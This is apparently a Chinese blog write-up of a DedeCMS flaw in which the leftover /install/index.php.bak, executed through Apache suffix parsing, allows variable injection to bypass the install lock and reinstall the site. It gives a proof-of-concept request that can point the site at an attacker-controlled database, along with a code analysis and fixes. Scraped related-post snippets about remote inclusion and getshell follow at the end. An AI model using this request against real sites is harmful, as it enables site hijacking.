dedecms /install/index.php.bak Installation File Not Deleted && Executed Via Apache Analytic Vul

catalog

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

1. 漏洞描述

概括梳理一下这个漏洞的成因

1. dedecms默认情况下安装完成之后,install安装目录并未删除,即安装脚本依然存在,只是被重命名为了index.php.bak文件
//Dedecms在安装后会把安装文件/install/index.php备份成/install/index.php.bak
2. apache存在一个解析漏洞,即会递归的逐个解析文件的后缀,直到配对到一个可以正确处理的后缀处理函数(ext handler)
//例如index.php.bak会被当成index.php来解析
3. dedecms广泛采用了"本地变量注册"的模拟实现,即
/*
foreach(Array(‘_GET‘,‘_POST‘,‘_COOKIE‘) as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
}
*/
这导致黑客可以通过传入指定关键变量以此改变代码的正常流程逻辑,以此绕过dedecms的"已安装状态检查"逻辑,实现重安装

Relevant Link:

http://zhanzhang.anquan.org/vul-detail/51b19a3ff159c80f0ab0b8a1/

2. 漏洞触发条件

1. install文件夹存在
2. apache解析漏洞

0x1: POC

http://www.cnseay.com/dedecms/install/index.php.bak?insLockfile=1&step=4
POST: step=4&dbhost=localhost&dbuser=root&dbpwd=123456&dbprefix=dede_&dbname=dedecms1&dblang=gbk&
//其中dbhost可以改为远程的黑客控制的db,以此达到劫持的目的

3. 漏洞影响范围
4. 漏洞代码分析

/install/index.php.bak

..
foreach(Array(‘_GET‘,‘_POST‘,‘_COOKIE‘) as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
}

require_once(DEDEINC.‘/common.func.php‘);

//黑客通过本地变量注入,修改$insLockfile的值,以此绕过dede的检测逻辑
if(file_exists($insLockfile))
{
    exit(" 程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!");
}
..

Relevant Link:

http://www.cnseay.com/2956/

5. 防御方法

1. 删除install文件夹
or
2. 删除/install/index.php.bak
3. 允许用户使用重新安装的功能,但对index.php.bak进行修复

/install/index.php.bak

if( file_exists(dirname(__FILE__).‘/install_lock.txt‘) )
{
    exit(" 程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!");
}

6. 攻防思考

在代码中的关键if判断处尽量避免使用变量,可以很大程度上防止本地变量覆盖导致的代码流黑黑客注入修改

Copyright (c) 2015 LittleHann All rights reserved

时间: 2024-10-10 22:12:12

dedecms /install/index.php.bak Installation File Not Deleted && Executed Via Apache Analytic Vul的相关文章

dedecms(<V5.7sp1) /install/index.php RFI

先来dedecms 5.6的测试 该poc利用有个限制,需要网站没有删除install文件夹及下面的文件. 同时,需要有一台自己能控制的服务器,用于远程文件包含,当然,如果能在目标站点的根目录下创建dedecms文件夹,并在其中创建demodata.a.txt文件,写入代码,也是可以的. 我的poc就是基于如此利用的: 这里也提供一个站点:http://www.mrjking.com/ 但不知道有没有后门,请慎用. 核心代码: 本来他是index.php.bak文件的,但是并不是所有的insta

How to Install WordPress – Complete WordPress Installation Tutorial

WordPress is known as the most popular blogging platform and content management system. New users are often surprised when we tell them that WordPress is also well known for its ease of installation. All best WordPress web hosting companies allow you

Referenced file contains errors (http://tiles.apache.org/dtds/tiles-config_3_0.dtd)

java开发时遇到的问题,之前还是好好的,没有错误提示.可是今天一打开项目就出现这种问题.真不知道是怎么回事,在这里求助.错误如下: Referenced file contains errors (http://tiles.apache.org/dtds/tiles-config_3_0.dtd). For more information, right click on the message in the Problems View and select "Show Details...&

[单选题]一个php文件的地址为c:/apache/htdocs/phptutor/index.php,虚拟主机的地址是c:/apache/htdocs,那么$_SERVER['PHP_SELF']应该评价到哪个页面

index.php /htdocs/phptutor/index.php /phptutor/index.php c:/apache/htdocs/phptutor/index.php $_SERVER['PHP_SELF'] #当前正在执行脚本的文件名,与 document root相关.$_SERVER['argv'] #传递给该脚本的参数.$_SERVER['argc'] #包含传递给程序的命令行参数的个数(如果运行在命令行模式).$_SERVER['GATEWAY_INTERFACE']

file xxx from install of xxx conflicts with file from xxx

执行安装 rpm -ivh lib64stdc++6-4.6.1-2-mdv2011.0.x86_64.rpm 时提示以下错误: warning: lib64stdc++6-4.6.1-2-mdv2011.0.x86_64.rpm: Header V3 DSA/SHA1 Signature, key ID 70771ff3: NOKEY Preparing... ########################################### [100%] file /usr/lib64/

<jsp:include page="index.jsp">和<%@include file="index.jsp" %>的区别

<%@ page language="java" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd&quo

jenkins install gitlab hook failed--cannot delete file

My OS: win10 Install method: jenkins.msi Problem: install gitlab hook failed. Problem description: cannot delete the target files/directory, and you can't more the directory. Reason: The path you indtalled jenkins cannot contain space, such as Progra

maven install 报错Could not calculate build plan: Plugin org.apache.maven.plugins:maven-resources-plugin

Could not calculate build plan: Plugin org.apache.maven.plugins:maven-resources-plugin:2.6 or one of its dependencies could not be resolved: Failed to read artifact descriptor for org.apache.maven.plugins:maven-resources-plugin:jar:2.6 解决方法: 删除maven库

dedeCMS远程写入getshell(测试版本V5.7)

该漏洞必须结合apache的解析漏洞: 当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名.如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是"text/plain"这种方式. dede在安装完成,如果没有删除install文件夹,在install下会有一个index.php.bak的备份文件,利用apache的解析漏洞,可以以php方式解析该文件. 在